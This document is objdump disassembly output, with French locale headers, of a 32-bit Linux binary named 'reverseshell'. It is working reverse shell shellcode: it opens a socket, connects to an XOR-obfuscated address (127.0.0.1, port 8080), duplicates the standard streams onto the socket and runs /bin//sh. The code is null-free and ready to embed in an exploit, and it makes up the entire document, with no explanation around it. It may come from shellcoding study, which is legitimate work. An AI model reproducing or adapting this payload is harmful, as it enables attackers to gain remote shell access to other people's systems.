
reverseshell:     format de fichier elf32-i386


Déassemblage de la section .data :

08049000 <_start>:
 8049000:	66 b8 67 01          	mov    $0x167,%ax
 8049004:	b3 02                	mov    $0x2,%bl
 8049006:	b1 01                	mov    $0x1,%cl
 8049008:	b2 06                	mov    $0x6,%dl
 804900a:	cd 80                	int    $0x80
 804900c:	97                   	xchg   %eax,%edi
 804900d:	31 c9                	xor    %ecx,%ecx
 804900f:	f7 e1                	mul    %ecx
 8049011:	51                   	push   %ecx
 8049012:	51                   	push   %ecx
 8049013:	b9 80 ff ff fe       	mov    $0xfeffff80,%ecx
 8049018:	83 f1 ff             	xor    $0xffffffff,%ecx
 804901b:	51                   	push   %ecx
 804901c:	66 68 1f 90          	pushw  $0x901f
 8049020:	66 6a 02             	pushw  $0x2
 8049023:	89 e1                	mov    %esp,%ecx
 8049025:	6a 10                	push   $0x10
 8049027:	5a                   	pop    %edx
 8049028:	89 fb                	mov    %edi,%ebx
 804902a:	66 b8 6a 01          	mov    $0x16a,%ax
 804902e:	cd 80                	int    $0x80
 8049030:	40                   	inc    %eax
 8049031:	83 f8 01             	cmp    $0x1,%eax
 8049034:	75 02                	jne    8049038 <fail>
 8049036:	eb 08                	jmp    8049040 <continue>

08049038 <fail>:
 8049038:	31 db                	xor    %ebx,%ebx
 804903a:	31 c0                	xor    %eax,%eax
 804903c:	b0 01                	mov    $0x1,%al
 804903e:	cd 80                	int    $0x80

08049040 <continue>:
 8049040:	87 df                	xchg   %ebx,%edi
 8049042:	6a 02                	push   $0x2
 8049044:	59                   	pop    %ecx

08049045 <loop>:
 8049045:	b0 3f                	mov    $0x3f,%al
 8049047:	cd 80                	int    $0x80
 8049049:	49                   	dec    %ecx
 804904a:	79 f9                	jns    8049045 <loop>
 804904c:	31 db                	xor    %ebx,%ebx
 804904e:	31 c9                	xor    %ecx,%ecx
 8049050:	31 d2                	xor    %edx,%edx
 8049052:	f7 e3                	mul    %ebx
 8049054:	53                   	push   %ebx
 8049055:	68 2f 2f 73 68       	push   $0x68732f2f
 804905a:	68 2f 62 69 6e       	push   $0x6e69622f
 804905f:	89 e3                	mov    %esp,%ebx
 8049061:	b0 0b                	mov    $0xb,%al
 8049063:	cd 80                	int    $0x80
